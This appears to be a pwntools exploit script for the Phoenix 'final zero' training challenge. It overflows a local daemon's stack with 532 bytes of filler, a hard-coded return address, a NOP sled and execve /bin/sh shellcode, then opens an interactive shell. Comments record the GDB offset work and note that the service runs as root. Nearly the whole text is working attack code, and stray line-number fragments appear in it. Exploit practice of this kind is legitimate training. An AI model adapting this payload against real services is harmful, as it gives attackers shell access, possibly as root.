
final 0 phoenix

#!/usr/bin/python

from pwn import *

# Module-level connection to the challenge daemon; opened at import time and
# shared with main() below.
p = remote(host="localhost", port=64013)
  6.  
def main() -> None:
    """Send the final-zero overflow payload over ``p`` and hand the session to the user.

    Target set-up notes (systemd unit under /etc/systemd/system). As recorded
    here the unit runs the daemon as root; the unprivileged account
    ``phoenix-i386-final-zero`` only appears as a commented-out ``User=`` line,
    so a successful overflow yields a root shell instead of an unprivileged
    one — the service should be run under the dedicated user::

        [Service]
        Type=simple
        Restart=always
        #User=phoenix-i386-final-zero
        User=root

    The offset and return address below come from a GDB crash and a dmesg
    trace of the target; returning into the stack like this only works while
    the stack address is stable (no ASLR) and the stack is executable, so
    either mitigation breaks the hard-coded ``ret_addr``.
    """

    # Skips prompt: drain whatever the daemon prints before reading input.
    p.recvrepeat(0.2)

    # From GDB:
    #
    # Stopped reason: SIGSEGV
    # 0x41507341 in ?? ()
    #
    # gdb-peda$ pattern_offset 0x41507341
    # 1095791425 found at offset: 532
    #
    # i.e. 532 bytes of filler reach the saved return address.

    log.info("Crafting payload")
    # NOTE(review): the payload is built from str literals; under Python 3
    # pwntools' p32() returns bytes and the concatenation below would raise
    # TypeError, so this script appears to target Python 2.
    buf = "A" * 532

    # dmesg | tail -n 5
    # traps: final-zero[4587] general protection ip:ffffd844 sp:ffffdd80 error:0
    #
    # ret_addr = esp + 50 (lands inside the NOP sled that follows it)

    ret_addr = 0xFFFFDDD4 # 0xffffdd80 + 50
    nop_sled = '\x90' * 100

    #----------------#
    # 532 A(Junk)    #
    #----------------#
    # To mid nopsled #  <- overwritten return address
    #----------------#
    # \x90 *100      #
    #----------------#
    # shellcode      #
    #----------------#

    # http://shell-storm.org/shellcode/files/shellcode-841.php
    # Tiny execve sh shellcode

    sh_code =  "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
    sh_code += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
    sh_code += "\x80"

    # Order matters: filler, then the return address, then sled + shellcode.
    buf += p32(ret_addr)
    buf += nop_sled
    buf += sh_code

    p.sendline(buf) # Sends payload

    log.warn("Payload sent!")

    p.interactive() # Pass interaction back to user
  69.  
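if __name__ == "__main__":
    # The call must be indented under the guard; at column 0 it is an
    # IndentationError. The remote() connection above still happens at
    # import time regardless of this guard.
    main()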